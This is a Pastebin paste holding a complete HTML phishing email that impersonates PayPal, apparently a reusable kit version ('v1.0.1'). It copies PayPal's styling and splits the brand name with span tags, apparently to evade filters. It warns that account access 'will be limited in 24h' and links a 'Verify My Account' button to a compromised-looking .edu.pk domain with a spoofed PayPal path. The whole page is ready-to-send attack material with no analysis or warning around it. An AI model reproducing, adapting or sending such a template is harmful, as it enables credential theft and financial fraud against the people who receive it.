Advertisement
MisterKlio

[MK] 2 Paypal Letter - v1.0.1

Jun 29th, 2017
256
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 20.69 KB | None | 0 0
  1.    
  2.         <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  3.         <meta name="viewport" content="initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,width=device-width,height=device-height,target-densitydpi=device-dpi,user-scalable=no">
  4.         <title>Confirm&nbsp;your&nbsp;accountz&nbsp;info</title>
  5.         <style type="text/css">
  6.    <style type='text/css'>
  7. /* PP Sans Font Import */
  8.  
  9. /* PP Sans Class */
  10. .ppsans {
  11.     font-family: 'pp-sans-big-light', 'Noto Sans', Calibri, Trebuchet, Arial, sans serif !important;
  12. }
  13. .ppsansbold {
  14.     font-family: 'pp-sans-big-bold', 'Noto Sans', Calibri, Trebuchet, Arial, sans serif !important;
  15. }
  16. /* prevent iOS font upsizing */
  17. * {
  18.     -webkit-text-size-adjust: none;
  19. }
  20. /* force Outlook.com to honor line-height */
  21. /*
  22. .ExternalClass * {
  23.     line-height: 100%;
  24. }
  25. td {
  26.     mso-line-height-rule: exactly;
  27. }
  28. */
  29. /* prevent iOS auto-linking */
  30.  
  31. /* Android margin fix */
  32. body {
  33.     margin: 0 !important;
  34. }
  35. div[style*="margin: 16px 0"] {
  36.     margin: 0 !important;
  37. }
  38. /** Prevent Outlook Purple Links **/
  39. .greyLink a:link {
  40.     color: #949595;
  41. }
  42. /* prevent iOS auto-linking */
  43. .applefix a { /* use on a span around the text */
  44.     color: inherit;
  45.     text-decoration: none;
  46. }
  47. .partner_image {
  48.  max-width: 250px !important;
  49.  max-height: 90px !important;
  50.  display: block;
  51. }
  52. .mpi_image {
  53.   width: 98% !important;
  54.   display: block;
  55.   margin-left: auto;
  56.   margin-right: auto;
  57. }
  58.  
  59. /*** Responsive CSS ***/
  60. @media only screen and (max-width: 414px) {
  61. /*** Layout ***/
  62. body {
  63.     width: 100%;
  64.     min-width: 100%;
  65.     position: relative;
  66.     top: 0;
  67.     left: 0;
  68.     right: 0;
  69.     margin: 0;
  70.     padding: 0;
  71. }
  72. .marginFix {
  73.     position: relative;
  74.     top: 0;
  75.     left: 0;
  76.     right: 0;
  77. }
  78. .mobContent {
  79.     width: 100% !important;
  80.     min-width: 100% !important;
  81.     padding: 0px 0px 0px 0px !important;
  82. }
  83. /*.mobMargin { width: 10% !important; }*/
  84. .hide {
  85.     width: 0px !important;
  86.     height: 0px !important;
  87.     display: none !important;
  88. }
  89. .full-width {
  90.     width: 100% !important;
  91.     min-width: 100% !important;
  92. }
  93. .stackTbl {
  94.     width: 100% !important;
  95.     display: table !important;
  96. }
  97. .stackTblMarginTop {
  98.     width: 100% !important;
  99.     display: table !important;
  100.     margin-top: 20px !important;
  101. }
  102. .center {
  103.     margin: 0px auto !important;
  104. }
  105. .floatLeft {
  106.     float: left !important;
  107.     width: 35% !important;
  108. }
  109. .floatRight {
  110.     float: right !important;
  111.     width: 60% !important;
  112. }
  113. .autoHeight {
  114.     height: auto !important;
  115. }
  116. .autoWidth {
  117.     width: auto !important;
  118. }
  119. /*** Padding Styles ***/
  120. .mobilePadding {
  121.     padding: 20px 20px 20px 20px !important;
  122. }
  123. .mobilePadding1 {
  124.     padding: 40px 20px 40px 20px !important;
  125.     height: auto !important;
  126. }
  127. .mobilePadding2 {
  128.     padding: 0px 20px 40px 20px !important;
  129. }
  130. .mobilePadding3 {
  131.     padding: 20px 20px 0px 20px !important;
  132. }
  133. .mobilePadding4 {
  134.     padding: 0px 0px 30px 0px !important;
  135. }
  136. .mobilePadding5 {
  137.     padding: 0px 20px 30px 20px !important;
  138. }
  139. .mobilePadding6 {
  140.     padding: 30px 20px 30px 20px !important;
  141. }
  142. .mobilePadding7 {
  143.     padding: 0px 20px 0px 20px !important;
  144. }
  145. .mobilePadding8 {
  146.     padding: 50px 0px 50px 0px !important;
  147. }
  148. .mobilePadding9 {
  149.     padding: 10px 0px 15px 0px !important;
  150. }
  151. .mobilePadding10 {
  152.     padding: 0px 20px 0px 20px !important;
  153. }
  154. .mobilePadding11 {
  155.     padding: 40px 0px 40px 0px !important;
  156. }
  157. .mobilePadding12 {
  158.     padding: 40px 0px 0px 0px !important;
  159. }
  160. .mobilePadding13 {
  161.     padding: 0px 0px 40px 0px !important;
  162. }
  163. .mobilePadding14 {
  164.     padding: 40px 30px 10px 30px !important;
  165. }
  166. .mobilePadding15 {
  167.     padding: 0px 30px 0px 30px !important;
  168. }
  169. .mobilePadding16 {
  170.     padding: 0px 0px 10px 0px !important;
  171. }
  172. .padding0 {
  173.     padding: 0px !important;
  174. }
  175. .topPadding0 {
  176.     padding-top: 0px !important;
  177. }
  178. .topPadding10 {
  179.     padding-top: 10px !important;
  180. }
  181. .topPadding20 {
  182.     padding-top: 20px !important;
  183. }
  184. .topPadding30 {
  185.     padding-top: 30px !important;
  186. }
  187. .topPadding40 {
  188.     padding-top: 40px !important;
  189. }
  190. .bottomPadding0 {
  191.     padding-bottom: 0px !important;
  192. }
  193. .bottomPadding10 {
  194.     padding-bottom: 10px !important;
  195. }
  196. .bottomPadding20 {
  197.     padding-bottom: 20px !important;
  198. }
  199. .bottomPadding30 {
  200.     padding-bottom: 30px !important;
  201. }
  202. .bottomPadding40 {
  203.     padding-bottom: 40px !important;
  204. }
  205. /* use to make image scale to 100 percent */
  206. .fullWidthImg {
  207.     width: auto !important;
  208.     height: auto !important;
  209. }
  210. .fullWidthImg img {
  211.     width: auto !important;
  212.     height: auto !important;
  213. }
  214. .mobile_hero_width {
  215.     width: auto !important;
  216.     height: auto !important;
  217. }
  218. /* background image replacement scalable height */
  219. .bgSwap {
  220.     background-image: url(images/lifestyle-background-mob.jpg) !important;
  221.     width: 100% !important;
  222.     padding-top: 65% !important;  /* update height here */
  223.     background-size: cover !important;
  224.     background-position: center top !important;
  225.     background-repeat: no-repeat !important;
  226.     display: block !important;
  227. }
  228. /*** Border Styles ***/
  229. .borderBottomDot {
  230.     border-bottom: 1px dotted #999999 !important;
  231. }
  232. /*** Text Align Styles ***/
  233. .textAlignLeft {
  234.     text-align: left !important;
  235. }
  236. .textAlignRight {
  237.     text-align: right !important;
  238. }
  239. .textAlignCenter {
  240.     text-align: center !important;
  241. }
  242. /*** Misc Styles ***/
  243. .mobileStrong {
  244.     font-weight: bold !important;
  245. }
  246. /*** Width Styles ***/
  247. .td150px {
  248.     width: 150px !important;
  249. }
  250. .td130px {
  251.     width: 130px !important;
  252. }
  253. .td120px {
  254.     width: 120px !important;
  255. }
  256. .td100px {
  257.     width: 100px !important;
  258. }
  259. /*** Image Width Styles ***/
  260. .imgWidth10px {
  261.     width: 10px !important;
  262. }
  263.  
  264. .no_mobile_phone {
  265.     display: none !important;
  266. }
  267. /*** END Responsive CSS ***/
  268. }
  269.  
  270. #button_text a {
  271.     text-decoration: none;
  272.     color: #fff;
  273. }
  274.  
  275. .button_blue{
  276.     background: #0079c1;
  277.         font-family:HelveticaNeueLight,HelveticaNeue-Light,Helvetica Neue Light,HelveticaNeue,Helvetica,Arial,sans-serif;
  278.         font-weight:300;
  279.         font-stretch:normal;
  280.         text-align:center;
  281.         color:#fff;
  282.         font-size:15px;
  283.         /*button styles*/
  284.         border-radius:7px !important;
  285.         -webkit-border-radius: 7px !important;
  286.         -moz-border-radius: 7px !important;
  287.         -o-border-radius: 7px !important;
  288.         -ms-border-radius: 7px !important;
  289.         /*styles from button.jsp */ line-height: 1.45em; padding: 7px 15px 8px; font-size: 1em;
  290.          padding-bottom: 7px; margin: 0 auto 16px;
  291. }
  292. .button_orange{
  293.     background: #FF3421;
  294.         /*font styles*/font-family:HelveticaNeueLight,HelveticaNeue-Light,Helvetica Neue Light,HelveticaNeue,Helvetica,Arial,sans-serif;
  295.         font-weight:300;
  296.         font-stretch:normal;
  297.         text-align:center;
  298.         color:#fff;
  299.         font-size:15px;
  300.         /*button styles*/
  301.         border-radius:7px !important;
  302.         -webkit-border-radius: 7px !important;
  303.         -moz-border-radius: 7px !important;
  304.         -o-border-radius: 7px !important;
  305.         -ms-border-radius: 7px !important;
  306.         /*styles from button.jsp */ line-height: 1.45em; padding: 7px 15px 8px; font-size: 1em;
  307.          padding-bottom: 7px; margin: 0 auto 16px;
  308. }
  309.  
  310. .button_grey{
  311.     background: #E0E0E0;
  312.         /*font styles*/font-family:HelveticaNeueLight,HelveticaNeue-Light,Helvetica Neue Light,HelveticaNeue,Helvetica,Arial,sans-serif;
  313.         font-weight:300;
  314.         font-stretch:normal;
  315.         text-align:center;
  316.         color:#fff;
  317.         font-size:15px;
  318.         /*button styles*/
  319.         border-radius:7px !important;
  320.         -webkit-border-radius: 7px !important;
  321.         -moz-border-radius: 7px !important;
  322.         -o-border-radius: 7px !important;
  323.         -ms-border-radius: 7px !important;
  324.         /*styles from button.jsp */ line-height: 1.45em; padding: 7px 15px 8px; font-size: 1em;
  325.          padding-bottom: 7px; margin: 0 auto 16px;
  326. }
  327.  
  328. *[class=button_style] {
  329.     border-radius: 7px !important;
  330.     -webkit-border-radius: 7px !important;
  331.     -moz-border-radius: 7px !important;
  332.     -o-border-radius: 7px !important;
  333.     -ms-border-radius: 7px !important;
  334. }
  335. *[class=button_style]:active {
  336.     background: #008bdb !important;
  337. }
  338. *[class=button_style]:hover {
  339.     background: #008bdb !important;
  340. }
  341.  
  342. /* A basic table styling */
  343. .aloha-ephemera-attr
  344. {
  345.   width: 100%;
  346.   cellspacing: 0px;
  347.   cellpadding: 0px;
  348.   border-top: 1px solid #ddd;
  349.   border-bottom: 1px solid #ddd;
  350.   -moz-hyphens : auto;
  351.   -ms-word-break: break-all;
  352.   word-break: break-all;
  353.   word-break: break-word;
  354.   -webkit-hyphens: auto;
  355.   -moz-hyphens: auto;
  356.   hyphens: auto;
  357. }
  358.  
  359. .aloha-ephemera-attr th
  360. {
  361.   background-color: #EEE;  
  362.   border-bottom: 1px solid #ddd;
  363.   border-right: 1px solid #ddd;
  364.   border-left: 1px solid #ddd;
  365.   border-collapse: collapse;
  366. }
  367.  
  368. .aloha-ephemera-attr td
  369. {
  370.  
  371. }
  372.  
  373.  
  374.        
  375.    body, td { font-family:Calibri, Trebuchet, Arial, sans serif; font-size:16px; line-height:22px; color:#333333; font-weight:normal;}    
  376.    td.ultility_nav_padding a {
  377.    color: #009cde;
  378.    font-weight: normal;
  379.    text-decoration: none;
  380.    font-family: Calibri, Trebuchet, Arial, sans serif;
  381.    font-size: 17px;
  382.    }
  383.    td.column_split_preheader a {
  384.    color: #009cde;
  385.    font-weight: normal;
  386.    text-decoration: underline;
  387.    font-family: Calibri, Trebuchet, Arial, sans serif;
  388.    font-size: 17px;
  389.    }
  390.    a {
  391.    color:#009cde;
  392.    font-weight: 300;
  393.    text-decoration: none;
  394.    font-family: Calibri, Trebuchet, Arial, sans serif;
  395.    font-size: 17px;
  396.    }
  397.    .headline{color: #0079c1; font-family: Helvetica Neue Light,Helvetica;font-size: 30px; font-weight: 300 !important;}
  398.    .text_lightblue_header { font-family:Calibri, Trebuchet, Arial, sans serif; font-size:36px; line-height:44px; color:#0079c1; -webkit-font-smoothing: antialiased; }
  399.  
  400.     sup {font-size:7px !important;}
  401. </style>
  402.      
  403.  
  404. <table class="marginFix" cellspacing="0" cellpadding="0" border="0" width="100%">
  405.   <!-- GRAY BACKGROUND -->
  406.   <tbody><tr>
  407.     <td class="mobMargin" style="font-size:0px;" bgcolor="#f2f2f2">&nbsp;</td>
  408.     <td class="mobContent" bgcolor="#ffffff" align="center" width="660">
  409.       <!-- inner container / place all modules below -->
  410.       <table cellspacing="0" cellpadding="0" border="0" width="100%">
  411.           <!-- BEGIN MAIN CONTENT -->
  412.           <tbody><tr><td valign="top" align="center" width="600">
  413.               <table cellspacing="0" cellpadding="0" border="0" width="100%">
  414.               <tbody><tr class="no_mobile_phone">
  415.                 <td style="padding-top:10px;" bgcolor="#f2f2f2"></td>
  416.               </tr>
  417.               <tr>
  418.                 <td style="padding-top:10px;" bgcolor="#f2f2f2"><br></td>
  419.               </tr>
  420.               <tr>
  421.                 <td valign="top" bgcolor="#ffffff" align="center">
  422.                   <!-- PLACE ALL MODS BELOW -->
  423.                   <!-- <span>Pa</span>yP<span>al</span> logo - start -->
  424.                     <table style="margin-bottom:10px;" contenteditable="false" cellspacing="0" cellpadding="0" border="0" width="100%">
  425.                         <tbody><tr valign="bottom">    
  426.                             <td valign="top" align="center" width="20">&nbsp;</td>
  427.                             <td align="left" height="64">
  428.                               <div style="font-family: 'Trebuchet MS'; black;color:#828282;padding-left:25px"><p style="  font-size:28px"><strong><em><font color="#003084">P<span><font>a</font></span>y</font><font color="#0098db">P<font>a</font>l</font></em></strong>
  429.                            <span style="font-size:10px;font-family:'Trebuchet MS'; black;color:#828282;"><span style="font-family: Trebuchet MS;font-size:10px;"><font size="1">&nbsp;update</font></span>&nbsp;<sub> </sub></span></p></div>
  430.                             </td>  
  431.                             <td valign="top" align="center" width="20">&nbsp;</td>
  432.                         </tr>
  433.                     </tbody></table>
  434.                  <!-- <span>Pa</span>yP<span>al</span> logo - start -->
  435.                  <!-- headline -->
  436.                     <table style="padding-bottom:10px; padding-top:10px;" contenteditable="false" cellspacing="0" cellpadding="0" border="0" width="100%">
  437.                         <tbody><tr valign="bottom">    
  438.                             <td valign="top" align="center" width="20">&nbsp;</td>
  439.                             <td>  
  440.                                 <span class="text_lightblue_header" style="font-family:Calibri, Trebuchet, Arial, sans serif; font-size:30px; line-height:44px; color:#0079c1; -webkit-font-smoothing: antialiased;">
  441.                                       <span style="display: inline;">
  442.  
  443. Your&nbsp;account&nbsp;access&nbsp;will&nbsp;be&nbsp;limited&nbsp;in&nbsp;24h.
  444. </span></span>
  445.                             </td>
  446.                             <td valign="top" align="center" width="20">&nbsp;</td>
  447.                         </tr>
  448.                     </tbody></table>
  449.                 <!-- body - start -->
  450.                     <table style="padding-bottom:10px; padding-top:10px;margin-bottom: 20px;" contenteditable="false" cellspacing="0" cellpadding="0" border="0" width="100%">
  451.                         <tbody><tr valign="bottom">    
  452.                             <td valign="top" align="center" width="20">&nbsp;</td>
  453.                             <td style="font-family:Calibri, Trebuchet, Arial, sans serif; font-size:15px; line-height:22px; color:#333333;" class="ppsans" valign="top">
  454.                                     <!-- EmailOpeningSalutation : start -->Dear&nbsp;Customer,&nbsp;
  455.  
  456. <!-- EmailOpeningSalutation : end --><br><span style="display: inline;"><p>- We need your help resolving an issue with your&nbsp;account.&nbsp;To give us time to work together on this, we've temporarily limited what you can do with your account until the issue is resolved.</p>
  457. <p>- We understand it may be frustrating not to have full access to your <span>Pa</span>yP<span>al</span> account. We want to work with you to get your account back to normal as quickly as possible.</p><p></p></span>
  458. <p> <strong> What's the problem ?</strong></p><p>- We need a little bit more information about you to help confirm your identity.
  459. &nbsp;</p><p><a style="color:#ffffff;border-radius:12px;padding: 10px; width: 185px;font-size: 15px; font-weight: bold; text-decoration: none; background-color: rgb(0, 121, 193); text-align: center;" target="_black" href="https://aimshydpak.edu.pk/accounts/sucure.pay.pal.com//home/"> Verify My Account </a>&nbsp;<br></p>
  460. <table class="howTo" style="font:11px Calibri, Trebuchet, Arial, sans serif, sans-serif;" contenteditable="false" cellspacing="0" cellpadding="10" border="0" width="100%"><tbody><tr><td style="background-color:#e8f1fa;"><span style="display: inline;"><p><strong> How you can help ?</strong></p><ol><li><span style="display: inline;">It's usually pretty easy to take care of things like this. Most of the time, we just need a little more information about your&nbsp;account or latest transactions.</span></li><li>To help us with this and to find out what you can and can't do with your account until the issue is resolved, log in to your&nbsp;account and go to the Resolution Center.</li></ol></span></td></tr></tbody></table><br><!-- EmailClosingSalutation : start -->Yours sincerely,<br><span>Pa</span>yP<span>al</span>
  461. <!-- EmailClosingSalutation : end --><br>
  462.                                 <span style="font-weight:bold; color:#444;">
  463.                                 </span>
  464.                                 <span>
  465.                                 </span>
  466.                             </td>
  467.                             <td valign="top" align="center" width="20">&nbsp;</td>
  468.                         </tr>
  469.                     </tbody></table>
  470.                 <!-- body - end -->
  471.                   <!-- PLACE ALL MODS ABOVE -->
  472.                 </td>
  473.               </tr>
  474.             </tbody></table></td>
  475.           <!-- END MAIN CONTENT -->          
  476.        </tr></tbody></table>
  477.       <!-- end inner container / place all modules above -->
  478.       <!--  footer modules -->
  479.       <table cellspacing="0" cellpadding="0" border="0" width="100%">
  480.           <!-- BEGIN FOOOTER CONTENT -->
  481.           <tbody><tr><td valign="top" align="center" width="600">
  482.               <table cellspacing="0" cellpadding="0" border="0" width="100%">
  483.               <tbody><tr>
  484.                   <td style="padding-top:20px;" bgcolor="#f2f2f2"><br></td>
  485.               </tr>
  486.               <tr>
  487.                 <td valign="top" bgcolor="#f2f2f2" align="center">
  488.                   <!-- PLACE ALL MODS BELOW -->
  489.                    <table contenteditable="false" cellspacing="0" cellpadding="0" border="0" width="100%">
  490.                         <tbody><tr valign="bottom">  
  491.                             <td valign="top" align="center" width="20">&nbsp;</td>
  492.                             <td>
  493.                                 <!--  footer links -->  
  494.                                 <table class="mobile_table_width_utility_nav" cellspacing="0" cellpadding="0" align="left" border="0">
  495.                                    <tbody>
  496.                                       <tr>
  497.                                          <td class="ultility_nav_padding" style="font-family:Calibri, Trebuchet, Arial, sans serif; -webkit-font-smoothing: antialiased; font-size:13px; color:#666; font-weight:bold;">
  498.                                             <span id="bottomLinks">
  499.                                                         <!-- EmailFooterLinks : start --><div class="footerLinks" style="margin: 5px 0; padding: 0;">
  500.  
  501. <span style="display: inline;">
  502. <span class="link" contentediable="false">
  503. <a href="" style="text-decoration:none;color:blue;" target="_BLANK">
  504. Help&nbsp;</a>
  505. </span>
  506. <span style="color:#ccc;">
  507. <span class="const"> | </span>
  508. </span>
  509. <span class="link" contentediable="false">
  510. <a href="" style="color:blue;text-decoration:none;" target="_BLANK">
  511. Security&nbsp;Centre&nbsp;</a>
  512. </span>
  513. </span>
  514.  
  515. </div>
  516. <!-- EmailFooterLinks : end -->
  517.                                             </span>
  518.                                          </td>
  519.                                       </tr>
  520.                                    </tbody>
  521.                                 </table>
  522.                            </td>
  523.                            <td valign="top" align="center" width="20">&nbsp;</td>    
  524.                         </tr>
  525.                     </tbody></table>          
  526.                     <table contenteditable="false" cellspacing="0" cellpadding="0" border="0" width="100%">
  527.                         <tbody><tr valign="bottom">  
  528.                             <td valign="top" align="center" width="20">&nbsp;</td>
  529.                             <td>
  530.                                     <p> Please do not reply to this email. To get in touch with us, click <strong><a href="" style="color:blue;text-decoration:none;" target="_BLANK">&nbsp;Help&nbsp;&amp; Contact&nbsp;</a></strong>.</p>
  531.                            </td>
  532.                            <td valign="top" align="center" width="20">&nbsp;</td>    
  533.                         </tr>
  534.                     </tbody></table>  
  535.                      <table contenteditable="false" cellspacing="0" cellpadding="0" border="0" width="100%">
  536.                         <tbody><tr valign="bottom">  
  537.                             <td valign="top" align="center" width="20">&nbsp;</td>
  538.                             <td>
  539.                                 <span style="font-family:Calibri, Trebuchet, Arial, sans serif; font-size:13px; !important color:#8c8c8c;">  
  540.                                     <!--  tracking -->
  541.                                     <table id="emailFooter" style="padding-top:20px;font:12px Arial, Verdana, Helvetica, sans-serif;color:#292929;" cellspacing="0" cellpadding="0" border="0" width="100%"><tbody><tr><td><p>Copyright © 1999 – 2017 <span>Pa</span>yP<span>al</span>. All rights reserved.</p>
  542. <p>Consumer&nbsp;advisory&nbsp;-&nbsp;<span>Pa</span>yP<span>al</span> Pte. Ltd. the holder of <span>Pa</span>yP<span>al</span>'s stored value facility, does not require the approval of the Monetary Authority of Singapore. Users are advised to read the terms and conditions carefully.</p><p class="footer ppid"><span>Pa</span>yP<span>al</span>&nbsp;PPX6985:94d2eb006f24e</p></td></tr></tbody></table>
  543.  
  544.  
  545.                                 </span>
  546.                            </td>
  547.                            <td valign="top" align="center" width="20">&nbsp;</td>    
  548.                         </tr>
  549.                     </tbody></table>    
  550.                   <!-- PLACE ALL MODS ABOVE -->
  551.                 </td>
  552.               </tr>
  553.             </tbody></table></td>
  554.           <!-- END MAIN CONTENT -->          
  555.        </tr></tbody></table>
  556.     </td>
  557.     <td class="mobMargin" style="font-size:0px;" bgcolor="#f2f2f2">&nbsp;</td>
  558.   </tr>
  559.   <!-- END GRAY BACKGROUND -->
  560. </tbody></table>
  561. <!-- END CONTAINER -->
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement